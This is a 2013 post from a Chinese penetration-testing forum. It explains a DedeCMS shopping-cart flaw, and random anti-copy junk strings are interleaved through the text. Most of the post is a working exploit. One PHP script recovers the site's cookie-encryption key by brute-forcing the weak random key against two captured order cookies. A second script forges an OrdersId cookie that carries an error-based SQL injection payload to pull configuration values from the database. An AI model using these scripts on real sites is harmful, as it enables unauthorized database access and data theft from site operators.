中国网络渗透测试联盟
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
3 u, Q: m! [0 B3 Q, C/ J
在 include/shopcar.class.php中
. {/ s! d: \& H% S8 ^ F1 z
先看一下这个shopcar类是如何生成cookie的
% x, D2 A8 _* Y! D n: G
239 function saveCookie($key,$value)
, V; N" G# I2 d' J
240 {
* \4 n5 S y5 `6 [+ j
241 if(is_array($value))
4 V2 ^8 { J, r# K) U l
242 {
+ w2 m7 i" i% h4 j! a3 q4 `
243 $value = $this->enCrypt($this->enCode($value));
6 p0 b* x2 p8 \, {& v7 A3 _
244 }
2 r( r6 A, J7 `/ ?5 f/ S% ]
245 else
$ \0 m; O/ y; C3 R' D: [" B) b
246 {
, i( J1 b1 L/ L1 T. I- U3 r# m
247 $value = $this->enCrypt($value);
! Z+ ^/ r/ n* I7 a7 k9 x& e/ Y! n; a
248 }
' G* I: ? ~. @* O$ p
249 setcookie($key,$value,time()+36000,’/');
: M$ [) c4 P. d: o" [1 L1 n
250 }
x C# u; l, \) {5 V
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
) E$ ?. p7 h- J7 j2 A/ Q$ N+ G
186 function enCrypt($txt)
) p; N; K8 u" x, k) c) p2 T
187 {
% n/ {5 M8 p9 Z5 J/ w) R
188 srand((double)microtime() * 1000000);
; _ D# U' a6 o" S0 _
189 $encrypt_key = md5(rand(0, 32000));
! O/ K6 y+ k3 M
190 $ctr = 0;
4 v% y$ G& Y+ b7 p& W- D& ~
191 $tmp = ”;
) o; x. k5 ^! X+ h; B
192 for($i = 0; $i < strlen($txt); $i++)
' R+ d/ U# V# @: x" o Z
193 {
; M- F: J, F! i1 b( I8 j- E
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% g- j6 ]6 d+ p" C0 B) U$ E
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
+ O, O& e+ x. @! W
196 }
; ~ ? t$ ~5 t( K( @, {5 s
197 return base64_encode($this->setKey($tmp));
4 C: y/ C$ ~3 W
198 }
% l' Y( X9 L/ }/ p4 p( x8 {% F! V: [
213 function setKey($txt)
0 z- Y8 H9 I2 Q
214 {
; v% ?$ p: ?' R4 l
215 global $cfg_cookie_encode;
( J: n- _1 o7 R Q5 q) P* ~
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
1 O& J/ q% T4 P/ H
217 $ctr = 0;
0 t: _4 R j; T% i
218 $tmp = ”;
$ u6 n4 F6 q7 u) o9 e8 D
219 for($i = 0; $i < strlen($txt); $i++)
. _* E/ i# J N; _
220 {
( W: E% L8 M6 p% C$ _$ B- T
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
; F2 _- Z C$ {% @
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
9 j. C/ C" m9 R3 ?$ L0 E6 F
223 }
+ P7 [% i1 Q$ w w q/ U
224 return $tmp;
+ |$ V' H) k. Z! i
225 }
) S/ c. O" e6 B1 b8 _ \3 F, _
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
5 m4 h' }% W: F# ?. |
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
9 u* n! p; U9 ~; v
具体代码如下:
6 {5 x8 Z, X8 ]" I$ g% ~! k6 N% R
<?php
% C- ?) M; n g
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
5 d- z$ l4 ?- [' F( c
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
) S4 }1 A5 V) g2 F
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
: q, X+ ~" n* `0 @7 N/ t U; m( G- S ?5 q
function reStrCode($code,$string)
7 K, K% T* G) U
{
+ j4 A1 A% L' b( J
$code = base64_decode($code);
/ v: }; U% E' N' f6 X
$key = “”;
6 Q3 o4 X; u8 w, _( E* S) k
for($i=0 ; $i<32 ; $i++)
9 F7 J. E' N% D
{
) e# X) K4 c/ y1 k6 }* `
$key .= $string[$i] ^ $code[$i];
1 A( _6 I2 J8 i
}
+ B5 l+ w+ S: ~
return $key;
% m q" I6 h1 t) Z, |# M
}
$ G/ h& w Q1 G( F0 _
function getKeys($cookie,$plantxt)
& o9 B/ n# b* T% @. k: Z
{
7 C$ h2 O# [7 P: B
$tmp = $cookie;
6 n/ B0 Q3 O$ f, V
$results = array();
/ K c, B& U9 P7 e; x" \
for($j=0 ; $j < 32000; $j++)
o" @( s+ r% f) n
{
& W% y- \5 w# l- C
/ d3 G' t- T8 R/ p2 Q
$txt = $plantxt;
/ Y& J2 \9 Z0 L5 h D2 [
$ctr = 0;
* V& @* N7 X; l% d8 F6 Q9 s
$tmp = ”;
; k3 o% K! i( S0 i$ ?
$encrypt_key = md5($j);
8 b% C) W& K( N- z
for($i =0; $i < strlen($txt); $i ++)
; ?. n9 M, r. h8 b7 g. o0 O
{
: H* A" F2 o$ R8 j
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
' P( l. F5 ~; p" s( _
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
& J+ [ _: ?# _ ] Q9 }% y
}
& X' x( O$ m, i, f' g
$string = $tmp;
- K0 f$ k1 Y! T( B' a* N6 x" o
$code = $cookie;
+ m6 C! v+ y9 \; v0 v' m
$result = reStrCode($code,$string);
$ R! H$ n$ s5 c' _# d
if(eregi(‘^[a-z0-9]+$’,$result))
; w; B4 [7 D8 _! {4 M! g
{
/ @4 q. x6 O P8 C% _4 I4 D
echo $result.”\n”;
, W8 D4 i. z' ^4 o( @8 t0 t9 T
$results[] = $result;
/ E I" ?! y% n; ?' ?+ O8 O3 c
}
: M2 c# H' H! C9 a
}
, l! I% t' }9 e0 x6 z: [. Y
return $results;
2 U2 ~. s5 R! \! n, V
}
. J* L% o0 N. Q' }* l' `* w9 y6 _) J
$results1 = getKeys($cookie1,$plantxt);
. C- ~; m: M e8 U G" S g
$results2 = getKeys($cookie2,$plantxt);
% d& ?* [& m8 Q' P" p2 ^9 N) B0 f8 q
print “\n——————–real key————————–\n”;
- Z) c& z% C+ L5 e2 f7 ^: k; u
foreach($results1 as $test1)
, a- c2 |+ b! U0 h5 j
{
4 M$ _" _, b8 _/ `* P5 X9 b4 A
foreach($results2 as $test2)
7 r: a$ [8 r5 H0 a# j! b
{
5 ]: }6 w- f5 W! m; o7 _: `
if($test1 == $test2)
% m& j4 a: p5 t* e/ Q0 U
{
; b& d |; Q' D' Z
echo $test1.”\n”;
5 q" H6 `9 S* C- d6 Z
}
d( a& X: H6 ?) g* o7 C
}
; l0 g3 g' e# h6 ^9 o) Z
}
$ x' s- k; b% N0 f4 P
?>
6 |5 ~& ^# E3 P6 P4 m, I* G) b Q& ` p) ?
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
. O+ D) |" C: u9 w
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
0 x& q" D1 N ]! w0 ?% w
然后推算出md5(strtolower($cfg_cookie_encode))
8 d1 W, _! _6 m" o9 i
得到这个key之后,我们就可以构造任意购物车的cookie
: W. B+ f2 }" n! T
接着看
/ R% ~. p, {: u% l7 r G
20 class MemberShops
2 B# s* j9 k6 z' B4 _
21 {
5 t* J7 ^ Y+ {/ b7 L" o. |& }. r
22 var $OrdersId;
* i% M6 A, d" X. G
23 var $productsId;
% G2 G; R# a1 x0 w
24
/ V) k7 {1 J( [
25 function __construct()
}+ B& ?; M) j2 t6 u. y2 v
26 {
0 s0 |5 c6 t) j. E% `2 g4 ~- E
27 $this->OrdersId = $this->getCookie(“OrdersId”);
, T1 H4 g/ q% A& J' H' a
28 if(empty($this->OrdersId))
( n# k6 w! i9 |0 F ~! F7 x
29 {
$ [6 z3 B7 ?6 D- J: n
30 $this->OrdersId = $this->MakeOrders();
+ h, b$ @6 A2 M8 w. U' Y) V
31 }
8 g( _; x$ o: F4 l2 |
32 }
4 _' N& q# ?5 K. p1 V+ n
发现OrderId是从cookie里面获取的
3 y: O, \3 I) \ C% R2 N* Q
然后
8 B; J+ w( I3 E6 n( p
/plus/carbuyaction.php中的
9 J# f" t X. X
29 $cart = new MemberShops();
+ |$ s9 _7 V& o# l( x: k& g
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
5 u% c# m# s2 O
……
+ z& m( y1 S6 ^( j8 l
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
3 N5 T3 p6 X) ^% B
接着我们就可以注入了
' Z' ^7 a* q: c* K( |. ?
通过利用下面代码生成cookie:
3 d/ L- S! x& h) _& a% C7 `
<?php
3 u9 G# C: I/ s1 }+ M% D
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
) O9 F7 I* B4 c3 L
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
y/ p& {! X) v n
function setKey($txt)
6 N" G& L; u+ e
{
: f9 j, ]6 E0 E$ L* s7 f; ^/ ]3 t+ x! K
global $encrypt_key;
. M8 p- {7 Q" c# t/ C; z3 g b
$ctr = 0;
# P! y4 } A* a
$tmp = ”;
% E1 W4 _8 p0 V% ~% G( d5 U
for($i = 0; $i < strlen($txt); $i++)
: Z! J8 l9 M' q
{
. B+ K# \9 J- b0 k/ T3 x
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
' m; s5 z" h5 Q" h3 @
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
/ \. J2 v; P1 y2 |; Z' N
}
) p- \' r3 @2 k" a7 l. e
return $tmp;
3 M+ L# _ `. P
}
# i- D: \; ~4 ^8 p3 c
function enCrypt($txt)
, z7 r: f- G) | p1 r H8 U" P& t
{
: b7 V) N2 Z+ M: i. ~
srand((double)microtime() * 1000000);
, B5 F- ~' L6 t/ f
$encrypt_key = md5(rand(0, 32000));
6 P4 Y. y: b3 {1 {- i: o3 M
$ctr = 0;
: L. e- V( p6 S+ Z" G
$tmp = ”;
- J0 x$ Q. y/ I, i: Z: \
for($i = 0; $i < strlen($txt); $i++)
3 T8 [- n3 x! l) l7 ~" ]
{
K! R0 j9 Y) K* g
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
9 ?) I9 r6 T- A+ E) M h3 |
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
2 J+ v3 r/ P, E# j! I
}
* M" M3 X- O3 O0 h" Q* V3 I- O
return base64_encode(setKey($tmp));
' A* H" q1 A2 a+ d0 |' p
}
/ S: B! U9 L" J2 y5 o* b
for($dest =0;$dest = enCrypt($txt);)
& ~- X7 U7 ]8 [
{
( M/ N* `# v$ r! R- {3 F# z. m; v
if(!strpos($dest,’+'))
0 {7 V$ w$ v) z; S% _
{
" F% U9 c% n. _
break;
, o$ I, ^' v# n L: H0 l
}
9 s8 U$ u. b7 H$ T, E& `- D/ {
}
8 {3 X* b3 q; b! C; n
echo $dest.”\n”;
1 `3 @: E2 ?' u
?>
; }( i7 i( H7 E9 a8 @6 Q
: \" Z# a2 U, O+ W' d1 h3 M
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2